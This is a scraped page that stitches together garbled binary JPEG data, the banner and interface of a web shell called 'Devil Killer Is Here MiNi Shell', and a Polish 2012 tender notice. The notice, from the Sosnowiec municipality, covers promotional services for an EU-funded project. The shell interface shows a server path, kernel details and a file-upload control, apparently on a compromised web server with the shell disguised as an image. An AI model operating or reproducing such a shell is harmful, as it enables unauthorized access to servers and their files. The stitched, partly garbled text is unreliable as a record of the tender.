JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/61277-N-2012.html

<p class="kh_header"><b>Sosnowiec: Przygotowanie i przeprowadzenie działań promocyjnych na potrzeby realizacji projektu dofinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WSL na lata 2007-2013, pn. -Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Gmina Sosnowiec-</b><br>
<b>Numer ogłoszenia: 61277 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie działań promocyjnych na potrzeby realizacji projektu dofinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WSL na lata 2007-2013, pn. -Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Gmina Sosnowiec-.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i przeprowadzenie działań promocyjnych na potrzeby realizacji projektu dofinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WSL na lata 2007-2013, pn. -Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Gmina Sosnowiec-. Zamówienie obejmuje następujące zadania:

<BR><B> 1.1 Artykuły prasowe </B>
<BR> Druk artykułów sponsorowanych w prasie lokalnej (z lokalnym zakresem zainteresowania obejmującym Gminę Sosnowiec i miasta ościenne - 3 artykuły) i regionalnej (z regionalnym zakresem zainteresowania obejmującym Województwo Śląskie - 3 artykuły) ukazującej się 
w Województwie Śląskim (w obu przypadkach nie rzadziej niż raz w tygodniu). Każdy artykuł to etap zadania (zlecenia) wymagający odrębnej treści i oprawy graficznej opracowanych przez Wykonawcę. 
Artykuły muszą ukazywać się minimum na 1/3 strony redakcyjnej jednak nie mogą być mniejsze niż 120x270mm.

Wykonawca przedstawi w siedzibie Zamawiającego wciągu 7 dni od pisemnego polecenia Zamawiającego rozpoczęcie realizacji etapu zadania, propozycję artykułu prasowego. Zamawiający dokona pisemnej akceptacji lub wniesie uwagi w terminie do 2 dni licząc od daty ich dostarczenia przez Wykonawcę. W przypadku zgłoszenia przez Zamawiającego uwag, Wykonawca uwzględni je i ponownie przekaże Zamawiającemu do akceptacji. Artykuł prasowy, po uzyskaniu pisemnej akceptacji Zamawiającego, publikuje Wykonawca nie później niż 21 dni od rozpoczęcia wykonywania etapu zadania. Wykonawca zobowiązany jest przedstawić w siedzibie Zamawiającego prasę zawierającą artykuł, co stanowić będzie podstawę do wystawienia protokołu odbioru wykonanego etapu zadania i faktury. 

<br>Artykuły prasowe muszą dodatkowo zawierać:
<br> - oznaczenia i logotypy zgodne z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji znajdującymi się na stronie: www.rpo.slaskie.pl 
<br> -oznaczenia gminy Sosnowiec spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie:
http://www.sosnowiec.pl/_upload/file/pdf/SOSNOWIEC%20Ksiega%20Identyfikacji01.pdf
<br> -nazwę projektu oraz Beneficjenta

<br><b>1.2.	Strona Internetowa
<br> Zaprojektowanie i wykonanie strony internetowej promującej projekt wraz z umieszczeniem strony na serwerze i wykupem domeny. 

<br>PARAMETRY STRONY</b>
<br>1.	Liczba zakładek lub podstron: 12.
<br>2.	Galeria na dowolną ilość zdjęć (zdjęcia dostarczone przez Zamawiającego).
<br>3.	Instalacja strony na serwerze, konfiguracja i testowanie (strona musi poprawnie działać na wszystkich dostępnych przeglądarkach internetowych).
<br>4.	Zgłoszenie wykonanej strony do wyszukiwarki Google
<br>5.	System CMS do samodzielnej aktualizacji

<br><b>PARAMETRY SERWERA WWW</b>
<br>1.	Pojemność serwera www nie mniej niż 10 GB
<br>2.	Transfer roczny bez ograniczeń
<br>3.	Wykup serwera na okres 3 lat
<br>4.	Prędkość działania serwera pozwalająca na płynne działanie strony internetowej

<br><b>DOMENA</b>
<br>1.	Domena w obszarze com.pl lub pl
<br>2.	Wykup domeny na okres 3 lat

<br><b>Strona internetowa i jej podstrony muszą zawierać:</b>
<br>- oznaczenia i logotypy zgodne z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji znajdującymi się na stronie: www.rpo.slaskie.pl 
<br> - oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie:
<br>http://www.sosnowiec.pl/_upload/file/pdf/SOSNOWIEC%20Ksiega%20Identyfikacji01.pdf

<br>Wykonawca przedstawi Zamawiającemu na spotkaniu w siedzibie Zamawiającego w ciągu 14 dni od dnia podpisania umowy trzy propozycje szablonów graficznych, propozycję domeny 
i serwera (wraz z jego parametrami) do akceptacji. Zamawiający zobowiązany będzie dokonać wyboru jednej z nich w terminie 2 dni licząc od daty ich dostarczenia przez Wykonawcę. 
W przypadku zgłoszenia przez Zamawiającego uwag do wybranej propozycji, Wykonawca uwzględni je w terminie 5 dni i ponownie przekaże Zamawiającemu do akceptacji na spotkaniu 
w siedzibie Zamawiającego. Zamawiający, w razie braku kolejnych uwag do zweryfikowanej wersji propozycji, przekaże akceptacje Wykonawcy w formie elektronicznej na wskazany przez Wykonawcę adres mailowy. 
Wykonawca w ciągu 60 dni od podpisania umowy z Zamawiającym uruchomi stronę internetową na serwerze.

<br>Po wykonaniu zadania Wykonawca przekaże Zamawiającemu wszelkie autorskie prawa majątkowe do dzieła (w tym prawa wyłączności), prawa do korzystania z domeny i serwera (wraz z hasłami), wszelkie informacje niezbędne do pełnego korzystania (wraz z edytowaniem) z całości zadania 2 oraz płytę DVD zawierającą kopię strony internetowej (kopię awaryjną zawierającą wszystkie pliki i skrypty). Po wykonaniu zadania Zamawiający wystawi protokół odbioru wykonania etapu zamówienia co stanowić będzie podstawę do wystawienia faktury.
Wykonawca wystawi gwarancję na poprawne działanie strony internetowej na okres trwałości projektu.

<br><b>1.3. Materiały informacyjno-promocyjne</b>
<br>Przygotowanie i dostarczenie do siedziby Zamawiającego 185 kompletów materiałów informacyjno-promocyjnych wraz z wykonaniem projektu graficznego, przygotowaniem nadruku 
i nadrukiem. W skład kompletu materiałów informacyjno-promocyjnych wchodzą:

<b><br>1.	Długopis:</b>
<br>a.	metalowy ze skuwką metalową, 
<br>b.	lakierowany w kolorze niebieskim lub zielonym zgodnym z kolorystyką zawartą w Księdze Identyfikacji Wizualnej marki Sosnowiec, 
<br>c.	z nadrukiem kolorowym (pełen kolor) dwustronnym zawierającym: 
<br> - z jednej strony - logotypy (UE, NSS, Gminy Sosnowiec, Województwa Śląskiego) wraz z podpisami zgodnymi z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji,
<br> -z drugiej strony - adres strony internetowej opisanej w zadaniu 1.2,
<br>d.	wkład duży niebieski,
<br>e.	odblokowanie wkładu poprzez standardowy mechanizm przyciskowy.

<br> <b>2.	Pendrive:</B>
<br>a.	w kolorze niebieskim lub zielonym zgodnym z kolorystyką zawartą w Księdze Identyfikacji Wizualnej marki Sosnowiec, 
<br>b.	zgodny z USB 2.0, 
<br>c.	pojemności min. 4GB, wraz z nagraniem informacji o projekcie opracowanej i dostarczonej przez Zamawiającego na 14 dni przed realizacją I etapu niniejszego zadania (do 300 MB) z zabezpieczeniem przed usunięciem, 
<br>d.	z gwarancją na co najmniej 24 miesiące,
<br>e.	z nadrukiem kolorowym (pełen kolor) dwustronnym zawierającym: 
<br> - z jednej strony - logotypy (UE, NSS, Gminy Sosnowiec, Województwa Śląskiego) wraz z podpisami zgodnymi z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji,
<br> -	z drugiej strony - adres strony internetowej opisanej w zadaniu 1.2.
<br><b>3.	Etui na CD: </b>
<br>a.	pojemności min. 10 szt. płyt CD/DVD, 
<br>b.	kształt kwadratowy, 
<br>c.	zamykane na zamek błyskawiczny, 
<br>d.	w kolorze niebieskim lub zielonym zgodnym z kolorystyką zawartą w Księdze Identyfikacji Wizualnej marki Sosnowiec,
<br>e.	z nadrukiem kolorowym (pełen kolor) jednostronnym zawierającym:
<br>-	logotypy (UE, NSS, Gminy Sosnowiec, Województwa Śląskiego) wraz z podpisami zgodnymi z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji,
<br>-	nazwę projektu: -Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Gmina Sosnowiec-.

<br><b>4.	Czyścik do monitora wraz z pędzelkiem do klawiatury:</b>
<br>a.	z nadrukiem kolorowym (pełen kolor) zawierającym:
<br>-	logotypy (UE, NSS, Gminy Sosnowiec, Województwa Śląskiego) wraz z podpisami zgodnymi z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji,
<br>-	nazwę projektu: -Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Gmina Sosnowiec-.
<br><b>5.	Torba ekologiczna:</b>
<br>a.	bawełniana torba z długimi rączkami,
<br>b.	kolorze ecru,
<br>c.	wielkość min. 38x42cm, 
<br>d.	gramatura materiału min. 105g, 
<br>e.	nadruk w jednym kolorze  zawierający:
<br>-	logotypy (UE, NSS, Gminy Sosnowiec, Województwa Śląskiego) wraz z podpisami wymaganymi i zgodnymi z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji,
<br>-	nazwę projektu: -Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Gmina Sosnowiec-.

<br><b>6.	Skoroszyt A5 (notatnik):</b>
<br>a.	min. 60 kartkowy w kratkę (dopuszczalne jednostronne kratkowanie),
<br>b.	papier min 90g, 
<br>c.	klejony od góry w bloczek, 
<br>d.	z dziurkami do wpięcia do segregatora z lewej strony, 
<br>e.	z nadrukiem kolorowym (pełen kolor) na każdej kartce (kratkowanej) zawierający:
<br>-	logotypy (UE, NSS, Gminy Sosnowiec, Województwa Śląskiego) wraz z podpisami zgodnymi z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji,
<br>-	nazwę projektu: -Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Gmina Sosnowiec-.

<br><b>7.	Karteczki samoprzylepne:</b>
<br>a.	zestaw zawierający min. 100 większych i min. 100 mniejszych karteczek samoprzylepnych oraz min. 5 kolorów samoprzylepnych karteczek min. po 25 sztuk każdy, 
<br>b.	wszystko zapakowane w twardą okładkę z nadrukami zawierającym:
<br>-logotypy (UE, NSS, Gminy Sosnowiec, Województwa Śląskiego) wraz z podpisami wymaganymi i zgodnymi z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji,
<br>-	nazwę projektu: -Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Gmina Sosnowiec-.

<br>Wszystkie wyżej wymienione materiały mają mieć nadruk lub tłoczenie zgodne z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007 - 2013 dla Beneficjentów w zakresie informacji i promocji znajdującymi się na stronie: www.rpo.slaskie.pl wraz z oznaczenia gminy Sosnowiec spójnym z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie:
http://www.sosnowiec.pl/_upload/file/pdf/SOSNOWIEC%20Ksiega%20Identyfikacji01.pdf 

Dodatkowo materiały informacyjno-promocyjne z punktów 5-7 mają mieć nadruk lub tłoczenie zawierające nazwę projektu: - Rozwój Społeczeństwa Informacyjnego w Zagłębiu Dąbrowskim - Gmina Sosnowiec-.

Wykonawca w przeciągu 21 dni od podpisania umowy przedstawi w siedzibie Zamawiającego projekty wszystkich materiałów informacyjno-promocyjnych wraz z próbkami materiałów bazowych (bez nadruku) do akceptacji. Zamawiający zobowiązany będzie dokonać akceptacji 
w terminie 2 dni licząc od daty ich dostarczenia przez Wykonawcę. W przypadku zgłoszenia przez Zamawiającego uwag do dostarczonych projektów i próbek materiałów bazowych, Wykonawca uwzględni je w terminie 5 dni i ponownie przekaże Zamawiającemu do akceptacji. Zamawiający dokona ostatecznej akceptacji w terminie 2 dni licząc od daty dostarczenia przez Wykonawcę zweryfikowanej propozycji projektów i próbek materiałów bazowych. Akceptację Zamawiający przekaże Wykonawcy w formie elektronicznej na wskazany przez Wykonawcę adres mailowy. 
<br>
<br>	Realizacja zadania odbywać się będzie jednoetapowo do 30.05.2013 r. - 185 kompletów, zakończonego protokołem odbioru wykonanego zamówienia (podstawa do wystawienia faktury).
<br>
<br>Wszystkie materiały informacyjno-promocyjne objęte będą co najmniej 12 miesięczną gwarancją Wykonawcy, rozpoczynającą się od dnia dostarczenia w/w materiałów do siedziby Zamawiającego.


<br><b>1.4. Tablice informacyjne i pamiątkowe</b>
<br>Zaprojektowanie, przygotowanie i montaż tablic informacyjnych (3 szt.) i tablic pamiątkowych (2szt.). Parametry tablic informacyjnych i pamiątkowych:
<br>1.	Rozmiar tablic: 250 cm x 200 cm,
<br>2.	Informacje zawarte na tablicach mają być każdorazowo uzgadniane z Zamawiającym i mają być zgodne z aktualnymi Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla Beneficjentów w zakresie informacji i promocji znajdującymi się na stronie: www.rpo.slaskie.pl.
<br>
<br>Tablice mają być wykonane z materiałów trwałych, tj. odpornych na warunki atmosferyczne, dzięki czemu zapewniona zostanie czytelność informacji oraz wysoki poziom estetyczny, co najmniej w okresie trwałości projektu (5 lat). 
Tablice będą montowane na fundamentach zewnętrznych niezwiązanych na trwałe z gruntem 
w miejscach wskazanych przez Zamawiającego (odległość tablicy od gruntu min. 2m) w sposób zapewniający maksymalną stabilność i bezpieczeństwo. Uzyskanie wymaganych pozwoleń na montaż tablic w miejscach wskazanych przez Zamawiającego spoczywać będzie na Zamawiającym.
<br>Realizacja zadania odbywać się będzie w dwóch etapach (I połowa 2012 r. - 3 tablice informacyjne, I połowa 2014r. - 2 tablice pamiątkowe) zakończonych protokołem odbioru wykonanego etapu zamówienia (podstawa do wystawienia faktury).
<br>Zamówienie może być realizowane z udziałem podwykonawców z tym, że Wykonawca jest zobowiązany w swojej ofercie wskazać, którą część zamówienia (zakres rzeczowy zamówienia), którą zamierza powierzyć Podwykonawcy/om do wykonania. Pozostały zakres zamówienia Wykonawca realizuje własnymi siłami.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli udokumentuje, że w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej 2 kampanie reklamowe o wartości co najmniej 50 000,00 zł zawierające minimum 3 zadania wymienione w Rozdziale III SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że dysponuje lub będzie dysponować następującymi osobami zdolnymi do wykonania zamówienia:
<br>a) co najmniej jedną osobę posiadającą doświadczenie w sporządzaniu artykułów prasowych, wymagana ilość artykułów 10 opublikowanych w prasie o zasięgu regionalnym,
<br>b) co najmniej jedną osobę z doświadczeniem w tworzeniu stron internetowych zgodnych 
z parametrami wymienionymi w Rozdziale III.1.2 SIWZ; wymagana ilość stworzonych i działających stron internetowych 3.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że posiada opłaconą polisą, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum
10 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
